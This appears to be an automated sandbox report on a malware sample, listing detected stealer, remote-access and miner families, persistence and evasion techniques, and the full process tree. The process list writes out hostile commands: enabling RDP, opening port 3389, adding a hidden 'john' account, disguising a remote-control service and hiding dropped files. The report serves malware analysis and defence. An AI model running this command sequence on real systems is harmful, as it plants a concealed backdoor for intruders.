Behavioral Report

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs
evasion trojan

TTPs:

Modify Registry Modify Existing Service Disabling Security Tools
Modifies visiblity of hidden/system files in Explorer ⋅ 2 TTPs
evasion

TTPs:

Hidden Files and Directories Modify Registry
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine Payload ⋅ 2 IoCs

Processes:

resource yara_rule

behavioral32/files/0x000200000001ac58-365.dat family_redline
behavioral32/files/0x000200000001ac58-366.dat family_redline
Windows security bypass ⋅ 2 TTPs
evasion trojan

TTPs:

Disabling Security Tools Modify Registry
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
ACProtect 1.3x - 1.4x DLL software ⋅ 2 IoCs
Detects file using ACProtect software.

Processes:

resource yara_rule

behavioral32/files/0x000100000001abe0-48.dat acprotect
behavioral32/files/0x000100000001abdf-47.dat acprotect
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges ⋅ 1 TTPs
Uses net.exe to modify the user's privileges.

TTPs:

Account Manipulation

resource	yara_rule
behavioral32/files/0x000200000001ac58-365.dat	family_redline
behavioral32/files/0x000200000001ac58-366.dat	family_redline

resource	yara_rule
behavioral32/files/0x000100000001abe0-48.dat	acprotect
behavioral32/files/0x000100000001abdf-47.dat	acprotect

XMRig Miner Payload ⋅ 3 IoCs

Processes:

resource	yara_rule
behavioral32/files/0x000100000001ac0e-422.dat	xmrig
behavioral32/files/0x000100000001ac0e-428.dat	xmrig
behavioral32/memory/4332-429-0x00007FF69E470000-0x00007FF69EA10000-memory.dmp	xmrig

ASPack v2.12-2.42 ⋅ 5 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
behavioral32/files/0x000300000001a4f4-28.dat	aspack_v212_v242
behavioral32/files/0x000300000001a4f4-27.dat	aspack_v212_v242
behavioral32/files/0x000300000001a4f4-38.dat	aspack_v212_v242
behavioral32/files/0x000300000001a4f4-43.dat	aspack_v212_v242
behavioral32/files/0x000300000001a4f4-45.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory ⋅ 2 IoCs

Processes:

cmd.exeupdate.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Executes dropped EXE ⋅ 39 IoCs

Processes:

wini.exewinit.execheat.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exetaskhostw.exeR8.exeRar.exeutorrent.exeupdate.exeazur.exetaskhost.exeRDPWInst.exesystem.exeRDPWinst.exeRDPWInst.exewinlogon.exeaudiodg.exeMicrosoftHost.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhost.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exe

pid	process
4028	wini.exe
2924	winit.exe
1376	cheat.exe
3272	taskhost.exe
3456	rutserv.exe
2320	rutserv.exe
580	rutserv.exe
3152	rutserv.exe
4596	taskhostw.exe
948	R8.exe
5024	Rar.exe
4960	utorrent.exe
2224	update.exe
4788	azur.exe
400	taskhost.exe
4844	RDPWInst.exe
4200	system.exe
4920	RDPWinst.exe
4772	RDPWInst.exe
4248	winlogon.exe
3184	audiodg.exe
4332	MicrosoftHost.exe
4984	taskhostw.exe
1260	taskhostw.exe
4436	taskhostw.exe
2868	taskhostw.exe
2036	taskhostw.exe
4648	taskhost.exe
1852	taskhostw.exe
5084	taskhostw.exe
3732	taskhostw.exe
1272	taskhostw.exe
1432	taskhostw.exe
1048	taskhostw.exe
1068	taskhostw.exe
1724	taskhostw.exe
3196	taskhostw.exe
1624	taskhostw.exe
1360	taskhostw.exe

Modifies Windows Firewall ⋅ 1 TTPs
evasion

TTPs:

Modify Existing Service
Sets DLL path for service in the registry ⋅ 2 TTPs
persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry
Sets file to hidden ⋅ 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

TTPs:

Hidden Files and Directories
Stops running service(s) ⋅ 3 TTPs
evasion

TTPs:

Modify Existing Service Service Stop

UPX packed file ⋅ 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral32/files/0x000100000001abe0-48.dat	upx
behavioral32/files/0x000100000001abdf-47.dat	upx
behavioral32/files/0x000400000001ac19-242.dat	upx
behavioral32/files/0x000400000001ac19-243.dat	upx
behavioral32/files/0x000200000001ac25-247.dat	upx
behavioral32/files/0x000200000001ac25-248.dat	upx
behavioral32/files/0x000200000001ac1e-401.dat	upx
behavioral32/files/0x000200000001ac1e-402.dat	upx

Loads dropped DLL ⋅ 6 IoCs

Processes:

azur.exe

pid process

4788 azur.exe
4788 azur.exe
4788 azur.exe
4788 azur.exe
4788 azur.exe
4788 azur.exe

pid	process
4788	azur.exe
4788	azur.exe
4788	azur.exe
4788	azur.exe
4788	azur.exe
4788	azur.exe

Modifies file permissions ⋅ 1 TTPs 56 IoCs

discovery

TTPs:

File Permissions Modification

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4488	icacls.exe
5076	icacls.exe
4244	icacls.exe
4404	icacls.exe
4720	icacls.exe
5088	icacls.exe
4368	icacls.exe
860	icacls.exe
5112	icacls.exe
4580	icacls.exe
4356	icacls.exe
4652	icacls.exe
4064	icacls.exe
4420	icacls.exe
4300	icacls.exe
4392	icacls.exe
4156	icacls.exe
4212	icacls.exe
4228	icacls.exe
4656	icacls.exe
4480	icacls.exe
4132	icacls.exe
3868	icacls.exe
4148	icacls.exe
4468	icacls.exe
4640	icacls.exe
4572	icacls.exe
208	icacls.exe
4384	icacls.exe
4680	icacls.exe
2128	icacls.exe
4808	icacls.exe
4988	icacls.exe
348	icacls.exe
4864	icacls.exe
4660	icacls.exe
4688	icacls.exe
4388	icacls.exe
5056	icacls.exe
3856	icacls.exe
4892	icacls.exe
5080	icacls.exe
4704	icacls.exe
4744	icacls.exe
4668	icacls.exe
4448	icacls.exe
4760	icacls.exe
4604	icacls.exe
4812	icacls.exe
4220	icacls.exe
4540	icacls.exe
4348	icacls.exe
4872	icacls.exe
4976	icacls.exe
4992	icacls.exe
5052	icacls.exe

Reads data files stored by FTP clients ⋅ 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads local data of messenger clients ⋅ 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads user/profile data of local email clients ⋅ 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads user/profile data of web browsers ⋅ 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
spyware

TTPs:

Data from Local System Credentials in Files

Adds Run key to start application ⋅ 2 TTPs 2 IoCs

persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry

Processes:

taskhostw.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks installed software on the system ⋅ 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

TTPs:

Query Registry
Legitimate hosting services abused for malware hosting/C2 ⋅ 1 TTPs

TTPs:

Web Service
Looks up external IP address via web service ⋅ 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ip-api.com
56 checkip.amazonaws.com

flow	ioc
23	ip-api.com
56	checkip.amazonaws.com

Modifies WinLogon ⋅ 2 TTPs 7 IoCs

persistence

TTPs:

Winlogon Helper DLL Modify Registry

Processes:

RDPWInst.exeupdate.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe

Drops file in System32 directory ⋅ 5 IoCs

Processes:

rutserv.exetaskhost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe

Drops file in Program Files directory ⋅ 26 IoCs

Processes:

update.exeutorrent.exeRDPWInst.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	utorrent.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices ⋅ 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery

Checks processor information in registry ⋅ 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

azur.exewinit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	azur.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	azur.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Creates scheduled task(s) ⋅ 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

TTPs:

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4980 schtasks.exe
4824 schtasks.exe
2176 schtasks.exe
3940 schtasks.exe
3160 schtasks.exe
3224 schtasks.exe
1524 schtasks.exe
Delays execution with timeout.exe ⋅ 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

5044 timeout.exe
4136 timeout.exe
4800 timeout.exe
4176 timeout.exe
756 timeout.exe
3700 timeout.exe
Gathers network information ⋅ 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

TTPs:

System Information Discovery Command-Line Interface

Processes:

ipconfig.exe

pid process

4968 ipconfig.exe
Kills process with taskkill ⋅ 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4192 taskkill.exe
3776 taskkill.exe
4164 taskkill.exe

pid	process
4980	schtasks.exe
4824	schtasks.exe
2176	schtasks.exe
3940	schtasks.exe
3160	schtasks.exe
3224	schtasks.exe
1524	schtasks.exe

pid	process
5044	timeout.exe
4136	timeout.exe
4800	timeout.exe
4176	timeout.exe
756	timeout.exe
3700	timeout.exe

pid	process
4968	ipconfig.exe

pid	process
4192	taskkill.exe
3776	taskkill.exe
4164	taskkill.exe

Modifies registry class ⋅ 6 IoCs

Processes:

winit.exeR8.execmd.exewini.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe

NTFS ADS ⋅ 3 IoCs

Processes:

taskhost.exeupdate.exeutorrent.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	update.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	utorrent.exe

Runs .reg file with regedit ⋅ 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

1616 regedit.exe
1036 regedit.exe
Runs net.exe

pid	process
1616	regedit.exe
1036	regedit.exe

Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs

Processes:

update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exe

pid	process
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
2320	rutserv.exe
2320	rutserv.exe
580	rutserv.exe
580	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe

Suspicious behavior: GetForegroundWindowSpam ⋅ 2 IoCs

Processes:

taskhostw.exetaskhost.exe

pid process

4596 taskhostw.exe
400 taskhost.exe
Suspicious behavior: LoadsDriver ⋅ 2 IoCs

Processes:

pid process

624
624

pid	process
4596	taskhostw.exe
400	taskhost.exe

pid	process
624
624

Suspicious use of AdjustPrivilegeToken ⋅ 14 IoCs

Processes:

rutserv.exerutserv.exerutserv.exetaskkill.exetaskkill.exetaskkill.exesystem.exeRDPWInst.exeRDPWinst.exesvchost.exeMicrosoftHost.exe

description	pid	process
Token: SeDebugPrivilege	3456	rutserv.exe
Token: SeDebugPrivilege	580	rutserv.exe
Token: SeTakeOwnershipPrivilege	3152	rutserv.exe
Token: SeTcbPrivilege	3152	rutserv.exe
Token: SeTcbPrivilege	3152	rutserv.exe
Token: SeDebugPrivilege	4192	taskkill.exe
Token: SeDebugPrivilege	3776	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	4200	system.exe
Token: SeDebugPrivilege	4844	RDPWInst.exe
Token: SeDebugPrivilege	4920	RDPWinst.exe
Token: SeAuditPrivilege	4536	svchost.exe
Token: SeLockMemoryPrivilege	4332	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	4332	MicrosoftHost.exe

Suspicious use of FindShellTrayWindow ⋅ 3 IoCs

Processes:

update.exe

pid process

2224 update.exe
2224 update.exe
2224 update.exe
Suspicious use of SendNotifyMessage ⋅ 3 IoCs

Processes:

update.exe

pid process

2224 update.exe
2224 update.exe
2224 update.exe

pid	process
2224	update.exe
2224	update.exe
2224	update.exe

pid	process
2224	update.exe
2224	update.exe
2224	update.exe

Suspicious use of SetWindowsHookEx ⋅ 11 IoCs

Processes:

winit.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhostw.exeR8.exeupdate.exe

pid	process
2924	winit.exe
3272	taskhost.exe
3456	rutserv.exe
2320	rutserv.exe
580	rutserv.exe
3152	rutserv.exe
4588	WinMail.exe
4568	WinMail.exe
4596	taskhostw.exe
948	R8.exe
2224	update.exe

Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes:

update.exewini.exeWScript.execmd.execheat.execmd.execmd.execmd.exe

description	pid	process	target process
PID 648 wrote to memory of 4028	648	update.exe	wini.exe
PID 648 wrote to memory of 4028	648	update.exe	wini.exe
PID 648 wrote to memory of 4028	648	update.exe	wini.exe
PID 4028 wrote to memory of 2916	4028	wini.exe	WScript.exe
PID 4028 wrote to memory of 2916	4028	wini.exe	WScript.exe
PID 4028 wrote to memory of 2916	4028	wini.exe	WScript.exe
PID 4028 wrote to memory of 2924	4028	wini.exe	winit.exe
PID 4028 wrote to memory of 2924	4028	wini.exe	winit.exe
PID 4028 wrote to memory of 2924	4028	wini.exe	winit.exe
PID 648 wrote to memory of 1376	648	update.exe	cheat.exe
PID 648 wrote to memory of 1376	648	update.exe	cheat.exe
PID 648 wrote to memory of 1376	648	update.exe	cheat.exe
PID 2916 wrote to memory of 1380	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 1380	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 1380	2916	WScript.exe	cmd.exe
PID 1380 wrote to memory of 1616	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1616	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1616	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1036	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1036	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1036	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 3700	1380	cmd.exe	timeout.exe
PID 1380 wrote to memory of 3700	1380	cmd.exe	timeout.exe
PID 1380 wrote to memory of 3700	1380	cmd.exe	timeout.exe
PID 1376 wrote to memory of 3272	1376	cheat.exe	taskhost.exe
PID 1376 wrote to memory of 3272	1376	cheat.exe	taskhost.exe
PID 1376 wrote to memory of 3272	1376	cheat.exe	taskhost.exe
PID 648 wrote to memory of 2176	648	update.exe	schtasks.exe
PID 648 wrote to memory of 2176	648	update.exe	schtasks.exe
PID 648 wrote to memory of 2176	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3940	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3940	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3940	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3160	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3160	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3160	648	update.exe	schtasks.exe
PID 1380 wrote to memory of 3456	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 3456	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 3456	1380	cmd.exe	rutserv.exe
PID 648 wrote to memory of 3224	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3224	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3224	648	update.exe	schtasks.exe
PID 648 wrote to memory of 1508	648	update.exe	cmd.exe
PID 648 wrote to memory of 1508	648	update.exe	cmd.exe
PID 648 wrote to memory of 1508	648	update.exe	cmd.exe
PID 648 wrote to memory of 4016	648	update.exe	cmd.exe
PID 648 wrote to memory of 4016	648	update.exe	cmd.exe
PID 648 wrote to memory of 4016	648	update.exe	cmd.exe
PID 1508 wrote to memory of 2164	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 2164	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 2164	1508	cmd.exe	sc.exe
PID 1380 wrote to memory of 2320	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 2320	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 2320	1380	cmd.exe	rutserv.exe
PID 4016 wrote to memory of 1968	4016	cmd.exe	sc.exe
PID 4016 wrote to memory of 1968	4016	cmd.exe	sc.exe
PID 4016 wrote to memory of 1968	4016	cmd.exe	sc.exe
PID 648 wrote to memory of 1188	648	update.exe	cmd.exe
PID 648 wrote to memory of 1188	648	update.exe	cmd.exe
PID 648 wrote to memory of 1188	648	update.exe	cmd.exe
PID 1188 wrote to memory of 2528	1188	cmd.exe	sc.exe
PID 1188 wrote to memory of 2528	1188	cmd.exe	sc.exe
PID 1188 wrote to memory of 2528	1188	cmd.exe	sc.exe
PID 1380 wrote to memory of 580	1380	cmd.exe	rutserv.exe

Views/modifies file attributes ⋅ 1 TTPs 5 IoCs
evasion

TTPs:

Hidden Files and Directories

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

748 attrib.exe
3584 attrib.exe
4140 attrib.exe
4224 attrib.exe
4208 attrib.exe

pid	process
748	attrib.exe
3584	attrib.exe
4140	attrib.exe
4224	attrib.exe
4208	attrib.exe

C:\Users\Admin\AppData\Local\Temp\update.exe

"C:\Users\Admin\AppData\Local\Temp\update.exe"

Drops file in Drivers directory
Modifies WinLogon
Drops file in Program Files directory
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory

PID:648

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

Executes dropped EXE
Modifies registry class
Suspicious use of WriteProcessMemory

PID:4028

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

Suspicious use of WriteProcessMemory

PID:2916

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

Suspicious use of WriteProcessMemory

PID:1380

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

Runs .reg file with regedit

PID:1616

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

Runs .reg file with regedit

PID:1036

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:3700

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

Executes dropped EXE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

PID:3456

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

Executes dropped EXE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx

PID:2320

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

Executes dropped EXE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

PID:580

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

Views/modifies file attributes

PID:748

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

Views/modifies file attributes

PID:3584

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

PID:2152

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

PID:2776

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

PID:2192

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

Executes dropped EXE
Checks processor information in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx

PID:2924

C:\Program Files (x86)\Windows Mail\WinMail.exe

"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE

Suspicious use of SetWindowsHookEx

PID:4588

C:\Program Files\Windows Mail\WinMail.exe

"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE

Suspicious use of SetWindowsHookEx

PID:4568

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

PID:4840

C:\Windows\SysWOW64\timeout.exe

timeout 5

Delays execution with timeout.exe

PID:5044

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

Executes dropped EXE
Suspicious use of WriteProcessMemory

PID:1376

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

Executes dropped EXE
NTFS ADS
Suspicious use of SetWindowsHookEx

PID:3272

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Executes dropped EXE
Adds Run key to start application
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx

PID:4596

C:\ProgramData\Microsoft\Intel\R8.exe

C:\ProgramData\Microsoft\Intel\R8.exe

Executes dropped EXE
Modifies registry class
Suspicious use of SetWindowsHookEx

PID:948

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

PID:2260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

Modifies registry class

PID:504

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill
Suspicious use of AdjustPrivilegeToken

PID:4192

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill
Suspicious use of AdjustPrivilegeToken

PID:3776

C:\Windows\SysWOW64\timeout.exe

timeout 3

Delays execution with timeout.exe

PID:4136

C:\Windows\SysWOW64\chcp.com

chcp 1251

PID:4852

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

Executes dropped EXE

PID:5024

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill
Suspicious use of AdjustPrivilegeToken

PID:4164

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:4800

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

PID:4236

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

PID:4364

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

PID:4532

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

PID:4424

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

PID:4748

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

PID:4100

